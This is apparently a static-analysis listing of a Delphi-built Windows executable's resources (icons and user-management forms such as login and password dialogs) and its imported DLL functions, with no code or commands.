                          RT_RCDATA0x10f6a640x12dPNG image data, 8 x 8, 8-bit/color RGBA, non-interlaced1.0066445182724253
                          RT_RCDATA0x10f6b940x15dPNG image data, 12 x 12, 8-bit/color RGBA, non-interlaced1.0143266475644699
                          RT_RCDATA0x10f6cf40x2303Delphi compiled form 'TAboutForm'0.2762467923686266
                          RT_RCDATA0x10f8ff80x75Delphi compiled form 'TAbstractOptionsEditorDialog'0.8461538461538461
                          RT_RCDATA0x10f90700x264PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0179738562091503
                          RT_RCDATA0x10f92d40x396PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0119825708061003
                          RT_RCDATA0x10f966c0x3a7PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.011764705882353
                          RT_RCDATA0x10f9a140x1b9Delphi compiled form 'TCalendarPopupForm'0.6054421768707483
                          RT_RCDATA0x10f9bd00x893Delphi compiled form 'TChangeParentDlg'0.3362186788154897
                          RT_RCDATA0x10fa4640x227PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0199637023593466
                          RT_RCDATA0x10fa68c0x1ddPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0230607966457024
                          RT_RCDATA0x10fa86c0x2d2PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0152354570637119
                          RT_RCDATA0x10fab400x335PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0133982947624847
                          RT_RCDATA0x10fae780x21aPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.020446096654275
                          RT_RCDATA0x10fb0940x318PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0138888888888888
                          RT_RCDATA0x10fb3ac0x36bPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0125714285714287
                          RT_RCDATA0x10fb7180x300PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0143229166666667
                          RT_RCDATA0x10fba180x43ePNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0101289134438305
                          RT_RCDATA0x10fbe580x580PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0078125
                          RT_RCDATA0x10fc3d80x3caPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.011340206185567
                          RT_RCDATA0x10fc7a40x5f1PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0072320841551612
                          RT_RCDATA0x10fcd980x7eePNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0054187192118227
                          RT_RCDATA0x10fd5880x282PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.017133956386293
                          RT_RCDATA0x10fd80c0x372PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0124716553287982
                          RT_RCDATA0x10fdb800x3edPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0109452736318407
                          RT_RCDATA0x10fdf700x256PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0183946488294315
                          RT_RCDATA0x10fe1c80x35fPNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0127462340672073
                          RT_RCDATA0x10fe5280x3a3PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.011815252416756
                          RT_RCDATA0x10fe8cc0x251PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0185497470489038
                          RT_RCDATA0x10feb200x38fPNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0120746432491767
                          RT_RCDATA0x10feeb00x3f9PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0108161258603736
                          RT_RCDATA0x10ff2ac0x30fPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0140485312899106
                          RT_RCDATA0x10ff5bc0x46ePNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.009700176366843
                          RT_RCDATA0x10ffa2c0x5afPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0075601374570446
                          RT_RCDATA0x10fffdc0x2e7PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0148048452220726
                          RT_RCDATA0x11002c40x47dPNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.009573542210618
                          RT_RCDATA0x11007440x530PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0082831325301205
                          RT_RCDATA0x1100c740x25aPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0182724252491695
                          RT_RCDATA0x1100ed00x3e6PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0110220440881763
                          RT_RCDATA0x11012b80x49dPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0093141405588484
                          RT_RCDATA0x11017580x304PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0142487046632125
                          RT_RCDATA0x1101a5c0x443PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.010082493125573
                          RT_RCDATA0x1101ea00x579PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0078515346181298
                          RT_RCDATA0x110241c0x31cPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.013819095477387
                          RT_RCDATA0x11027380x4c0PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.009046052631579
                          RT_RCDATA0x1102bf80x645PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.006853582554517
                          RT_RCDATA0x11032400x30ePNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.014066496163683
                          RT_RCDATA0x11035500x3d2PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0112474437627812
                          RT_RCDATA0x11039240xd65Delphi compiled form 'TCheckGroupEditorDlg'0.342082239720035
                          RT_RCDATA0x110468c0x6feDelphi compiled form 'TCheckListBoxEditorDlg'0.3865921787709497
                          RT_RCDATA0x1104d8c0x575Delphi compiled form 'TCollectionPropertyEditorForm'0.42018611309949894
                          RT_RCDATA0x11053040x352Delphi compiled form 'TComponentListEditorForm'0.5141176470588236
                          RT_RCDATA0x11056580x886Delphi compiled form 'TDataPointsEditorForm'0.45187901008249315
                          RT_RCDATA0x1105ee00x2bePNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0156695156695157
                          RT_RCDATA0x11061a00x3c8PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0113636363636365
                          RT_RCDATA0x11065680x4b4PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0091362126245846
                          RT_RCDATA0x1106a1c0x3c9PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0113519091847265
                          RT_RCDATA0x1106de80x473PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.009657594381036
                          RT_RCDATA0x110725c0x701PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0061349693251533
                          RT_RCDATA0x11079600x9453Delphi compiled form 'TEditListForm'0.5148139369518844
                          RT_RCDATA0x1110db40x1ac5Delphi compiled form 'TEnvMsgForm'0.41062308478038817
                          RT_RCDATA0x111287c0x664Delphi compiled form 'TFileFilterPropEditForm'0.4339853300733496
                          RT_RCDATA0x1112ee00x3756Delphi compiled form 'TFormUserPerf'0.312861781730905
                          RT_RCDATA0x11166380x2178Delphi compiled form 'TFrame_Profile'0.29901960784313725
                          RT_RCDATA0x11187b00x1ba9Delphi compiled form 'TfrmIncluirPerfil'0.47691004095466744
                          RT_RCDATA0x111a35c0x274dDelphi compiled form 'TfrmIncluirUsuario'0.4294801709571613
                          RT_RCDATA0x111caac0x1165Delphi compiled form 'TfrmLoginWindow'0.4212890186391197
                          RT_RCDATA0x111dc140xda4Delphi compiled form 'TGraphicPropertyEditorForm'0.3104238258877434
                          RT_RCDATA0x111e9b80x17bPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0158311345646438
                          RT_RCDATA0x111eb340x1f5PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0219560878243512
                          RT_RCDATA0x111ed2c0x24cPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0187074829931972
                          RT_RCDATA0x111ef780x792Delphi compiled form 'TKeyValPropEditorFrm'0.4102167182662539
                          RT_RCDATA0x111f70c0x235PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0194690265486726
                          RT_RCDATA0x111f9440x2f3PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.014569536423841
                          RT_RCDATA0x111fc380x362PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.01270207852194
                          RT_RCDATA0x111ff9c0x11905Delphi compiled form 'TMainForm'0.6137529364340223
                          RT_RCDATA0x11318a40x10fbDelphi compiled form 'TMaskEditorForm'0.2797331492983667
                          RT_RCDATA0x11329a00x1535Delphi compiled form 'TMsgRecForm'0.3442622950819672
                          RT_RCDATA0x1133ed80x60c2Delphi compiled form 'TMsgsForm'0.15651998385143318
                          RT_RCDATA0x1139f9c0x440PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.010110294117647
                          RT_RCDATA0x113a3dc0x795PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.005667181865018
                          RT_RCDATA0x113ab740x9fbPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0043052837573385
                          RT_RCDATA0x113b5700xa67Delphi compiled form 'TNewListForm'0.4693954187007135
                          RT_RCDATA0x113bfd80x52dDelphi compiled form 'TObjectInspectorDlg'0.48452830188679247
                          RT_RCDATA0x113c5080x992Delphi compiled form 'TOptionForm'0.3926530612244898
                          RT_RCDATA0x113ce9c0xb3dDelphi compiled form 'TPagesPropEditorFrm'0.26312130691692737
                          RT_RCDATA0x113d9dc0x308PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0141752577319587
                          RT_RCDATA0x113dce40x450PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0099637681159421
                          RT_RCDATA0x113e1340x57cPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0078347578347577
                          RT_RCDATA0x113e6b00x17aDelphi compiled form 'TScreenForm'0.7222222222222222
                          RT_RCDATA0x113e82c0xd53Delphi compiled form 'TSelectPropertiesForm'0.29991204925241866
                          RT_RCDATA0x113f5800x971Delphi compiled form 'TSenhaForm'0.6301199834505585
                          RT_RCDATA0x113fef40x1071Delphi compiled form 'TSmallOrderedSetEditDlg'0.2753623188405797
                          RT_RCDATA0x1140f680x2e1PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0149253731343284
                          RT_RCDATA0x114124c0x495PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0093776641091219
                          RT_RCDATA0x11416e40x5aaPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0075862068965518
                          RT_RCDATA0x1141c900x3c17Delphi compiled form 'TStringGridEditorDlg'0.7323018916986284
                          RT_RCDATA0x11458a80x9cbDelphi compiled form 'TStringsPropEditorFrm'0.33905065815715996
                          RT_RCDATA0x11462740x431PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0102516309412861
                          RT_RCDATA0x11466a80x6f5PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0061763054463784
                          RT_RCDATA0x1146da00x9dcPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0043581616481776
                          RT_RCDATA0x114777c0x40aPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0106382978723405
                          RT_RCDATA0x1147b880x709PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0061077179344808
                          RT_RCDATA0x11482940x9adPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0044408558740412
                          RT_RCDATA0x1148c440x455PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0099188458070334
                          RT_RCDATA0x114909c0x769PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0057986294148655
                          RT_RCDATA0x11498080x9cfPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0043807248108323
                          RT_RCDATA0x114a1d80x463PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0097951914514693
                          RT_RCDATA0x114a63c0x679PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0066385033192518
                          RT_RCDATA0x114acb80x9c7PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0043947263284059
                          RT_RCDATA0x114b6800x439PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0101757631822386
                          RT_RCDATA0x114babc0x714PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0060706401766004
                          RT_RCDATA0x114c1d00x90fPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0047434238896076
                          RT_RCDATA0x114cae00x39cPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0119047619047619
                          RT_RCDATA0x114ce7c0x63bPNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.006896551724138
                          RT_RCDATA0x114d4b80x888PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.00503663003663
                          RT_RCDATA0x114dd400x369PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0126002290950744
                          RT_RCDATA0x114e0ac0x615PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0070648683365446
                          RT_RCDATA0x114e6c40x7ffPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0053737176355642
                          RT_RCDATA0x114eec40x41ePNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0104364326375712
                          RT_RCDATA0x114f2e40x739PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.005949161709032
                          RT_RCDATA0x114fa200x9f9PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0043086564825696
                          RT_RCDATA0x115041c0x440PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.010110294117647
                          RT_RCDATA0x115085c0x745PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0059108006448145
                          RT_RCDATA0x1150fa40x96cPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0045605306799337
                          RT_RCDATA0x11519100x401PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0107317073170732
                          RT_RCDATA0x1151d140x69dPNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.006497341996456
                          RT_RCDATA0x11523b40x8eePNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.004811898512686
                          RT_RCDATA0x1152ca40x3acPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0117021276595746
                          RT_RCDATA0x11530500x658PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0067733990147782
                          RT_RCDATA0x11536a80x885PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.005043558000917
                          RT_RCDATA0x1153f300x3bbPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0115183246073298
                          RT_RCDATA0x11542ec0x651PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0068027210884354
                          RT_RCDATA0x11549400x869PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0051091500232234
                          RT_RCDATA0x11551ac0x567PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0079537237888647
                          RT_RCDATA0x11557140xa0cPNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.004276827371695
                          RT_RCDATA0x11561200xdc7PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0031187978451943
                          RT_RCDATA0x1156ee80x377PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.012401352874859
                          RT_RCDATA0x11572600x685PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0065907729179149
                          RT_RCDATA0x11578e80x85aPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0051449953227316
                          RT_RCDATA0x11581440x37fPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.012290502793296
                          RT_RCDATA0x11584c40x5c9PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0074274139095205
                          RT_RCDATA0x1158a900x7c3PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0055359838953195
                          RT_RCDATA0x11592540x470PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0096830985915493
                          RT_RCDATA0x11596c40x791PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0056788848735156
                          RT_RCDATA0x1159e580xa3bPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0042000763650247
                          RT_RCDATA0x115a8940x866Delphi compiled form 'TTimePopupForm'0.4441860465116279
                          RT_RCDATA0x115b0fc0x3cdPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0113052415210688
                          RT_RCDATA0x115b4cc0x650PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0068069306930694
                          RT_RCDATA0x115bb1c0x895PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0050068274920345
                          RT_RCDATA0x115c3b40x348PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.013095238095238
                          RT_RCDATA0x115c6fc0x626PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0069885641677256
                          RT_RCDATA0x115cd240x754PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.005863539445629
                          RT_RCDATA0x115d4780x420PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0104166666666667
                          RT_RCDATA0x115d8980x726PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0060109289617487
                          RT_RCDATA0x115dfc00x987PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.004510045100451
                          RT_RCDATA0x115e9480x430PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.0102611940298507
                          RT_RCDATA0x115ed780x725PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0060142154182614
                          RT_RCDATA0x115f4a00x975PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0045435770342834
                          RT_RCDATA0x115fe180x3a3PNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.011815252416756
                          RT_RCDATA0x11601bc0x638PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.0069095477386936
                          RT_RCDATA0x11607f40x866PNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0051162790697674
                          RT_RCDATA0x116105c0x1dd5Delphi compiled form 'TTrocaSenha'0.5284797695430142
                          RT_RCDATA0x1162e340x7c12Delphi compiled form 'TUCAboutForm'0.9044140797179019
                          RT_RCDATA0x116aa480x78a9Delphi compiled form 'TUCEditorForm'0.45071060895464404
                          RT_RCDATA0x11722f40xf3eDelphi compiled form 'TUCEMailForm'0.26319835981547923
                          RT_RCDATA0x11732340x284cDelphi compiled form 'TUCFrame_Log'0.2678363706863125
                          RT_RCDATA0x1175a800x28e8Delphi compiled form 'TUCFrame_User'0.3364209320091673
                          RT_RCDATA0x11783680xfe1Delphi compiled form 'TUCFrame_UsersLogged'0.4777367773677737
                          RT_RCDATA0x117934c0x43fcDelphi compiled form 'TUCObjSel'0.22264996552516664
                          RT_RCDATA0x117d7480x33aPNG image data, 24 x 24, 8-bit/color RGBA, non-interlaced1.013317191283293
                          RT_RCDATA0x117da840x4c1PNG image data, 36 x 36, 8-bit/color RGBA, non-interlaced1.009038619556286
                          RT_RCDATA0x117df480x5ffPNG image data, 48 x 48, 8-bit/color RGBA, non-interlaced1.0071661237785017
                          RT_RCDATA0x117e5480x3fafDelphi compiled form 'TUserPermis'0.3025210084033613
                          RT_GROUP_CURSOR0x11824f80x14Lotus unknown worksheet or configuration, revision 0x11.25
                          RT_GROUP_CURSOR0x118250c0x14Lotus unknown worksheet or configuration, revision 0x11.25
                          RT_GROUP_CURSOR0x11825200x30Lotus unknown worksheet or configuration, revision 0x30.8958333333333334
                          RT_GROUP_CURSOR0x11825500x30Lotus unknown worksheet or configuration, revision 0x30.9375
                          RT_GROUP_CURSOR0x11825800x30Lotus unknown worksheet or configuration, revision 0x30.9375
                          RT_GROUP_CURSOR0x11825b00x30Lotus unknown worksheet or configuration, revision 0x30.9375
                          RT_GROUP_CURSOR0x11825e00x30Lotus unknown worksheet or configuration, revision 0x30.9375
                          RT_GROUP_CURSOR0x11826100x30Lotus unknown worksheet or configuration, revision 0x30.9375
                          RT_GROUP_CURSOR0x11826400x30Lotus unknown worksheet or configuration, revision 0x30.9375
                          RT_GROUP_CURSOR0x11826700x14Lotus unknown worksheet or configuration, revision 0x11.3
                          RT_GROUP_CURSOR0x11826840x14Lotus unknown worksheet or configuration, revision 0x11.3
                          RT_GROUP_CURSOR0x11826980x14Lotus unknown worksheet or configuration, revision 0x11.3
                          RT_GROUP_CURSOR0x11826ac0x14Lotus unknown worksheet or configuration, revision 0x1SerbianItaly1.3
                          RT_GROUP_ICON0x11826c00x14data1.15
                          RT_VERSION0x11826d40x298OpenPGP Public Key0.48493975903614456
                          RT_MANIFEST0x118296c0x6e6XML 1.0 document, ASCII text, with CRLF line terminators0.41959229898074746
                          DLLImport
                          kernel32.dllGetStdHandle, GetConsoleMode, TlsGetValue, GetLastError, SetLastError, RaiseException, GetTickCount, ExitProcess, GetStartupInfoA, GetCommandLineA, GetCurrentProcessId, GetCurrentThreadId, GetCurrentProcess, ReadProcessMemory, GetModuleFileNameA, GetModuleHandleA, WriteFile, ReadFile, CloseHandle, SetFilePointer, GetFileSize, SetEndOfFile, GetSystemInfo, LoadLibraryW, LoadLibraryA, GetProcAddress, FreeLibrary, FormatMessageW, DeleteFileW, CreateFileW, GetFileAttributesW, CreateDirectoryW, SetCurrentDirectoryW, GetCurrentDirectoryW, GetFullPathNameW, GetConsoleOutputCP, GetOEMCP, GetProcessHeap, HeapAlloc, HeapFree, TlsAlloc, TlsSetValue, CreateThread, ExitThread, LocalAlloc, LocalFree, Sleep, SuspendThread, ResumeThread, TerminateThread, WaitForSingleObject, SetThreadPriority, GetThreadPriority, GetCurrentThread, OpenThread, IsDebuggerPresent, CreateEventA, ResetEvent, SetEvent, InitializeCriticalSection, DeleteCriticalSection, EnterCriticalSection, LeaveCriticalSection, TryEnterCriticalSection, MultiByteToWideChar, WideCharToMultiByte, GetACP, GetConsoleCP, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, RtlUnwindEx, EnumResourceTypesA, EnumResourceNamesA, EnumResourceLanguagesA, FindResourceA, FindResourceExA, LoadResource, SizeofResource, LockResource, FreeResource, GetEnvironmentStringsA, FreeEnvironmentStringsA, FormatMessageA, CreateFileMappingA, GetLogicalDriveStringsA, GlobalAddAtomA, GetWindowsDirectoryA, GetComputerNameA, GetVersionExA, CompareStringA, GetLocaleInfoA, GetDateFormatA, EnumCalendarInfoA, GetModuleFileNameW, GetCommandLineW, GetSystemDirectoryW, SetFileAttributesW, CreateProcessW, FindNextFileW, CompareStringW, GetLocaleInfoW, GetDateFormatW, FindFirstFileExW, GlobalAlloc, GlobalReAlloc, GlobalSize, GlobalLock, GlobalUnlock, GetProcessAffinityMask, TerminateProcess, GetExitCodeProcess, GetExitCodeThread, SetErrorMode, GlobalDeleteAtom, DeviceIoControl, FindClose, DuplicateHandle, MulDiv, GetLocalTime, FileTimeToLocalFileTime, FileTimeToDosDateTime, CreatePipe, PeekNamedPipe, MapViewOfFile, UnmapViewOfFile, GetCPInfo, GetThreadLocale, SetThreadLocale, GetUserDefaultLCID
                          oleaut32.dllSysAllocStringLen, SysFreeString, SysReAllocStringLen, VariantChangeTypeEx, VariantClear, VariantCopy, VariantInit, SafeArrayAccessData, SafeArrayCreate, SafeArrayGetElement, SafeArrayGetLBound, SafeArrayGetUBound, SafeArrayPtrOfIndex, SafeArrayPutElement, SafeArrayRedim, SafeArrayUnaccessData
                          user32.dllMessageBoxA, CharUpperBuffW, CharLowerBuffW, RegisterWindowMessageA, PeekMessageA, SendMessageA, PostMessageA, DefWindowProcA, CallWindowProcA, RegisterClassA, UnregisterClassA, GetClassInfoA, RegisterClassExA, GetClassInfoExA, CreateWindowExA, SendDlgItemMessageA, RegisterClipboardFormatA, GetClipboardFormatNameA, CharToOemA, CharUpperA, CharUpperBuffA, CharLowerA, CharLowerBuffA, GetMenuItemInfoA, SetPropA, GetPropA, RemovePropA, EnumPropsA, GetWindowLongA, SetWindowLongA, GetClassLongA, GetClassLongPtrA, SetClassLongPtrA, FindWindowA, GetClassNameA, LoadBitmapA, LoadCursorA, LoadIconA, LoadImageA, SystemParametersInfoA, DispatchMessageW, PeekMessageW, SendMessageW, PostMessageW, DefWindowProcW, CallWindowProcW, RegisterClassW, UnregisterClassW, GetClassInfoW, CreateWindowExW, InsertMenuItemW, GetMenuItemInfoW, SetMenuItemInfoW, DrawTextW, DrawStateW, SetWindowTextW, GetWindowTextW, GetWindowTextLengthW, MessageBoxW, GetWindowLongPtrW, SetWindowLongPtrW, DefFrameProcW, DefMDIChildProcW, TranslateMessage, PostQuitMessage, GetDoubleClickTime, IsWindow, IsMenu, DestroyWindow, ShowWindow, ShowWindowAsync, MoveWindow, SetWindowPos, GetWindowPlacement, SetWindowPlacement, BeginDeferWindowPos, DeferWindowPos, EndDeferWindowPos, IsWindowVisible, IsIconic, BringWindowToTop, IsZoomed, GetDlgItem, GetDialogBaseUnits, OpenClipboard, CloseClipboard, SetClipboardData, GetClipboardData, CountClipboardFormats, EnumClipboardFormats, EmptyClipboard, IsClipboardFormatAvailable, SetFocus, GetActiveWindow, GetFocus, GetKeyState, GetCapture, SetCapture, ReleaseCapture, MsgWaitForMultipleObjects, SetTimer, KillTimer, EnableWindow, IsWindowEnabled, GetSystemMetrics, GetMenu, SetMenu, DrawMenuBar, GetSystemMenu, CreateMenu, CreatePopupMenu, DestroyMenu, EnableMenuItem, GetSubMenu, GetMenuItemCount, RemoveMenu, DeleteMenu, GetMenuItemRect, UpdateWindow, SetActiveWindow, GetForegroundWindow, SetForegroundWindow, WindowFromDC, GetDC, GetDCEx, GetWindowDC, ReleaseDC, BeginPaint, EndPaint, GetUpdateRect, SetWindowRgn, InvalidateRect, InvalidateRgn, RedrawWindow, ScrollWindowEx, ShowScrollBar, EnableScrollBar, GetClientRect, GetWindowRect, AdjustWindowRectEx, MessageBeep, SetCursorPos, SetCursor, GetCursorPos, CreateCaret, GetCaretBlinkTime, DestroyCaret, HideCaret, ShowCaret, SetCaretPos, GetCaretPos, ClientToScreen, ScreenToClient, MapWindowPoints, WindowFromPoint, GetSysColor, GetSysColorBrush, SetSysColors, DrawFocusRect, FillRect, FrameRect, SetRect, InflateRect, IntersectRect, UnionRect, OffsetRect, IsRectEmpty, PtInRect, GetDesktopWindow, GetParent, SetParent, EnumChildWindows, EnumThreadWindows, GetTopWindow, GetWindowThreadProcessId, GetLastActivePopup, GetWindow, CallNextHookEx, DestroyCursor, DestroyIcon, CopyImage, CreateIconIndirect, GetIconInfo, SetScrollInfo, GetScrollInfo, TranslateMDISysAccel, DrawEdge, DrawFrameControl, TrackPopupMenuEx, ChildWindowFromPointEx, DrawIconEx, FlashWindowEx, GetAncestor
                          advapi32.dllGetUserNameA, RegSetValueExW, RegQueryValueExW, RegCreateKeyExW, RegOpenKeyExW, RegCloseKey, RegFlushKey
                          gdi32.dllCreateFontIndirectA, EnumFontFamiliesA, GetCharABCWidthsA, GetTextExtentPointA, GetTextMetricsA, GetObjectA, ExtTextOutA, CreateFontIndirectW, EnumFontFamiliesExW, GetCharABCWidthsW, GetTextExtentPoint32W, GetTextExtentExPointW, GetObjectW, TextOutW, ExtTextOutW, GetRandomRgn, Arc, BitBlt, Chord, CombineRgn, CreateBitmap, CreateBrushIndirect, CreateCompatibleBitmap, CreateCompatibleDC, CreateDIBitmap, CreateEllipticRgn, CreatePen, CreatePenIndirect, CreatePatternBrush, CreateRectRgn, CreateRoundRectRgn, CreateSolidBrush, DeleteDC, DeleteObject, Ellipse, EqualRgn, ExcludeClipRect, ExtCreateRegion, ExtFloodFill, FillRgn, GetROP2, GetBkColor, GetBitmapBits, GetClipBox, GetClipRgn, GetCurrentObject, GetDeviceCaps, GetDIBits, GetMapMode, GetObjectType, GetPixel, GetRegionData, GetRgnBox, GetStockObject, GetTextAlign, GetTextColor, GetViewportExtEx, GetViewportOrgEx, GetWindowExtEx, GetWindowOrgEx, IntersectClipRect, LineTo, MaskBlt, OffsetRgn, PatBlt, Pie, PaintRgn, PtInRegion, RectInRegion, RectVisible, Rectangle, RestoreDC, RealizePalette, RoundRect, SaveDC, SelectClipRgn, ExtSelectClipRgn, SelectObject, SelectPalette, SetBkColor, SetBkMode, SetMapMode, SetPixel, SetPolyFillMode, StretchBlt, SetRectRgn, StretchDIBits, SetROP2, SetStretchBltMode, SetTextCharacterExtra, SetTextColor, SetTextAlign, CreateDIBSection, SetArcDirection, ExtCreatePen, MoveToEx, CreatePolygonRgn, DPtoLP, LPtoDP, Polygon, Polyline, PolyBezier, SetViewportExtEx, SetViewportOrgEx, SetWindowExtEx, SetWindowOrgEx, OffsetViewportOrgEx, SetBrushOrgEx, GetDCOrgEx
                          version.dllGetFileVersionInfoSizeA, GetFileVersionInfoA, VerQueryValueA
                          shell32.dllDragQueryFileA, ShellExecuteA, Shell_NotifyIconA, DragQueryFileW, Shell_NotifyIconW, DragFinish, DragAcceptFiles, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW
                          ole32.dllCoCreateGuid, CoTaskMemFree, OleInitialize, OleUninitialize, OleCreateFromFile, OleSetContainedObject, CreateILockBytesOnHGlobal, CoUninitialize, CoCreateInstance, CoInitialize, CoTaskMemAlloc, StgCreateDocfile, StgCreateDocfileOnILockBytes, GetErrorInfo
